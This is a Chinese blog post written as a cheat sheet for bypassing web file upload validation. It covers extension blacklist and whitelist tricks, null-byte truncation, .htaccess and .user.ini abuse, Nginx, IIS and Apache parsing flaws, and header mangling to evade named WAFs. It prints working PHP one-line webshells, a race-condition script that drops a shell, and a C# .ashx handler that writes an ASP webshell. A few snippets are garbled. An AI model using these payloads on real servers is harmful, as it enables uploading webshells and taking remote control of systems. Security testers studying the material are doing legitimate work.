web 文件上传绕过

已于 2023-07-05 11:13:24 修改
阅读量170 收藏 1
点赞数
分类专栏: 信息安全 文章标签: 前端 网络安全
于 2023-07-05 11:05:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jang2023/article/details/131551594
版权

黑名单绕过

1. 特殊解析后缀:php2,php3,php5

2. .htaccess解析:htaccess是apache的一种解析文件,可以修改文件的解析方法

3. 大小写绕过:大小写混合格式

4. 点绕过win特征:上传时抓包,在文件名后加 . ,系统存储文件会自动删除末尾. 

5. 空格绕过:上传时抓包,在文件名后加空格,系统存储文件会自动删除末尾空格[0x20]

6. ::$$DATA绕过(要求windowns):上传时抓包,在文件名后加::$$DATA,系统识别为文件流会忽略末

7. /.绕过:文件支持自命名,在上传时候抓包修改为/upload/1.php/.   系统认为该地址是文件

8. 双写后缀名绕过:后端没有对文件名进行多次过滤,可以抓包将后缀改为1.pphphp

9. 一次过滤绕过:后端没有对文件名进行多次过滤,可以抓包将后缀改为1.php.空格.或任意多个点与空格组合

10. 系统特征:在windows传1.php:.jpg,会产生空白文件1.php,再利用正则匹配修改成1.>>>或者1.<<<则可以成功上传

11. 作用域配置文件回显:(上传目录存在.php)上传.user.ini
GIF89a                  
auto_prepend_file=shell.jpg
再上传shell.jpg
GIF89a
<?=system('cat /flag');?>
<?Php eval(@$_POST['password']);?>
<?=eval($_REQUEST[c]);?>
蚁剑连接.php文件

白名单绕过

目录可控:(gpc关闭且php<5.3.4)GET POST %00截断 urldecode,1.php%001.jpg

文件名可控:解析漏洞,GET %00截断,POST %00截断 urldecode

解析漏洞配合或文件包含(include.php?file=upload/xx.gif)

内容及其他

MIME绕过:包头的Content-Type修改为白名单类型Content-Disposition: form-data; name=“file”;  filename=php.php;.jpg

文件头检测:16进制打开,更改文件头,绕过(要配合文件包含漏洞)  连接include.php?file=upload/xx.gif

突破exif__imagetype:只接受图片,上传正常图(要配合文件包含漏洞)

二次渲染:图片上传上去后能在网站进行二次更改,对比两个图片未更改地方进行添加一句话木马,最好使用gif

条件竞争:图片上传上去后能网站进行二次更改,涉及逻辑漏洞,如果验证是在上传之后,那么在上传的同时已经把图片保存服务器,所以可以不断访问该文件或不断上传文件,占用不让服务器能删除文件,或者上传一个可以产生一句话木马的马<?php fputs(fopen('1.php','w'),'<?php @eval($_POST['cmd'])?>');?>

数组绕过:代码中存在拼接函数可用。修改上传路径为数组save_name[],利用post数据和/.继续绕过拼接

中间件漏洞

nginx
nginx<0.83 空字节代码执行漏洞:0x00截断:/1.jpg%00php
fix_pathinfo:1.jpg/1.php   1.jpg%00.php  1.jpg/%20\0.php


IIS
IIS5.x-IIS6.x:/1.asp/1.jpg    1.asp;jpg   1.asa 1.cer 1.cdx
IIS7.5:a.aspx.a;.a.aspx.jpg..jpg
IIS6.0在解析asp格式的时候有两个解析漏洞:一个是如果目录名包含".asp"字符串,那么这个目录下所有的文件都会按照asp去解析,另一个是只要文件名中含有".asp;会优先按asp来解析
IIS7.0/7.5:是对php解析时有一个类似于Nginx的解析漏洞,对任意文件名只要在URL后面追加上字符串"/任意文件名.php"就会按照php的方式去解析;

apache
apache 1x-2x 不认识后缀,右向左判断解析:1.php.php123
AddHandler: php5-script.php 1.php.jpg
Apache2.4.0-2.4.29 HTTPD换行解析漏洞(CVE-2017-15715):1.php\x0A按php解析

WAF绕过

安全狗绕过

1.绕过思路:对文件的内容,数据。数据包进行处理。

关键点在这里Content-Disposition: form-data; name="file"; filename="ian.php"
将form-data;            修改为~form-data;

2.通过替换大小写来进行绕过

Content-Disposition: form-data; name="file"; filename="yjh.php"
Content-Type: application/octet-stream
将Content-Disposition    修改为content-Disposition
将 form-data            修改为Form-data
将 Content-Type         修改为content-Type

3.通过删减空格来进行绕过

Content-Disposition: form-data; name="file"; filename="yjh.php"
Content-Type: application/octet-stream
将Content-Disposition: form-data          冒号后面 增加或减少一个空格
将form-data; name="file";                分号后面 增加或减少一个空格
将 Content-Type: application/octet-stream   冒号后面 增加一个空格

4.通过字符串拼接绕过

看Content-Disposition: form-data; name="file"; filename="yjh3.php"
将 form-data 修改为   f+orm-data
将 from-data 修改为   form-d+ata

5.双文件上传绕过

<form action="https://www.xxx.com/xxx.asp(php)" method="post"
name="form1" enctype="multipart/form‐data">
<input name="FileName1" type="FILE" class="tx1" size="40">
<input name="FileName2" type="FILE" class="tx1" size="40">
<input type="submit" name="Submit" value="上传">
</form>

6.HTTP header 属性值绕过

Content-Disposition: form-data; name="file"; filename="yjh.php"
我们通过替换form-data 为*来绕过
Content-Disposition: *; name="file"; filename="yjh.php"

7.HTTP header 属性名称绕过

源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
C.php"
删除掉ontent-Type: image/jpeg只留下c,将.php加c后面即可,但是要注意额,双引号要跟着c.php".

8.等效替换绕过

原内容:
Content-Type: multipart/form-data; boundary=---------------------------471463142114
修改后:
Content-Type: multipart/form-data; boundary =---------------------------471463142114
boundary后面加入空格。

9.修改编码绕过

使用UTF-16、Unicode、双URL编码等等

WTS-WAF 绕过上传

原内容:
Content-Disposition: form-data; name="up_picture"; filename="xss.php"
添加回车
Content-Disposition: form-data; name="up_picture"; filename="xss.php"

百度云上传绕过

百度云绕过就简单的很多很多,在对文件名大小写上面没有检测php是过了的,Php就能过,或者PHP,一句话自己合成图片马用Xise连接即可。
Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php"

阿里云上传绕过

源代码:
Content-Disposition: form-data; name="img_crop_file"; filename="1.jpg .Php"Content-Type: image/jpeg
修改如下:
Content-Disposition: form-data; name="img_crop_file"; filename="1.php"
没错,将=号这里回车删除掉Content-Type: image/jpeg即可绕过。

360主机上传绕过

源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下:
Content- Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
Content-Disposition 修改为 Content-空格Disposition

MIME类型绕过

上传木马时,提示格式错误。直接抓包修改Content-Type 为正确的格式尝试绕过

文件内容检测绕过

抓包,在正常图片末尾添加一句话木马

多次上传Win特性绕过

多次上传同一个文件,windows会自动更新补全TEST (1).php。
有时会触发条件竞争,导致绕过。

条件竞争绕过

通过BURP不断发包,导致不断写入Webshell,再写入速度频率上超过安全软件查杀频率,导致绕过。

CONTENT-LENGTH绕过

针对这种类型的验证,我们可以通过上传一些非常短的恶意代码来绕过。上传文件的大小取决于,Web服务器上的最大长度限制。我们可以使用不同大小的文件来fuzzing上传程序,从而计算出它的限制范围。

文件内容检测绕过

针对文件内容检测的绕过,一般有两种方式,
1.制作图片马
2.文件幻术头绕过

垃圾数据填充绕过

修改HTTP请求,再之中加入大量垃圾数据。

黑名单后缀绕过

ashx上传绕过

cer,asa,cdx等等无法使用时候。 解析后就会生成一个test.asp的马,你就可以连接这个test.asp  密码为:put <%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler { 
public void ProcessRequest (HttpContext context) {
    context.Response.ContentType = "text/plain";

    //这里会在目录下生成一个test.asp的文件
    StreamWriter file1= File.CreateText(context.Server.MapPath("test.asp"));
    //这里是写入一句话木马   密码是:ptu
    file1.Write("&lt;%response.clear:execute request("put"):response.End%&gt;");
    file1.Flush();
    file1.Close();       
}
public bool IsReusable {
    get {
        return false;
    }
}

}

特殊文件名绕过

比如发送的 http包里把文件名改成 test.asp. 或 test.asp_(下划线为空格),这种命名方式在windows系统里是不被允许的,所以需要在 burp之类里进行修改,然后绕过验证后,会被windows系统自动去掉后面的点和空格,但要注意Unix/Linux系统没有这个特性。

Windows流特性绕过

php在windows的时候如果文件名+"::DATA"会把::DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名。

白名单后缀绕过

00截断绕过上传

php .jpg   空格二进制20改为00
IIS 6.0 目录路径检测解析绕过
上传路径改为
XXX/1.asp/

htaccess解析漏洞

上传的jpg文件都会以php格式解析
.htaccess内容:
AddType    application/x-httpd-php    .jpg

突破MIME限制上传

方法:找一个正常的可上传的查看其的MIME类型,然后将马子的MIME改成合法的MIME即可。

Apache解析漏洞

1.一个文件名为test.x1.x2.x3的文件,apache会从x3的位置开始尝试解析,如果x3不属于apache能够解析的扩展名,那么apache会尝试去解析x2,直到能够解析到能够解析的为止,否则就会报错。
2.CVE-2017-15715,这个漏洞利用方式就是上传一个文件名最后带有换行符(只能是\x0A,如上传a.php,然后在burp中修改文件名为a.php\x0A),以此来绕过一些黑名单过滤。

IIS解析漏洞

IIS6.0在解析asp格式的时候有两个解析漏洞,一个是如果目录名包含".asp"字符串,那么这个目录下所有的文件都会按照asp去解析,另一个是只要文件名中含有".asp;会优先按asp来解析
IIS7.0/7.5是对php解析时有一个类似于Nginx的解析漏洞,对任意文件名只要在URL后面追加上字符串"/任意文件名.php"就会按照php的方式去解析;

Nginx解析漏洞

解析: (任意文件名)/(任意文件名).php | (任意文件名)%00.php
描述:目前Nginx主要有这两种漏洞,一个是对任意文件名,在后面添加/任意文件名.php的解析漏洞,比如原本文件名是test.jpg,可以添加为test.jpg/x.php进行解析攻击。
还有一种是对低版本的Nginx可以在任意文件名后面添加%00.php进行解析攻击。

解析漏洞

Content-Disposition: form-data; name=“file”;  filename=php.php;.jpg

前端限制绕过

1.使用BURP抓包修改后重放
2.或者使用浏览器中元素审查,修改允许或禁止上传文件类型。

下载绕过

远程下载文件绕过

<?php
$str = file_get_contents(‘http://127.0.0.1/ian.txt’);str(_post[‘ian’]);
?>

文件包含绕过

上传图片木马
x=_GET[‘x’];
include($x);
访问:http://www.xxxx.com/news.php?x=xxxxxx.jpg

条件竞争

图片上传上去后能网站进行二次更改,涉及逻辑漏洞,如果验证是在上传之后,那么在上传的同时已经把图片保存服务器,所以可以不断访问该文件或不断上传文件,占用不让服务器能删除文件,或者上传一个可以产生一句话木马的马
<?php 
fputs(fopen('1.php','w'),'<?php @eval($_POST['cmd'])?>');
?>


import requests
url=""
while True:
	html = request.get(url)
	if html.status_code ==200:
		print("oK")
		break
Jang2023
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值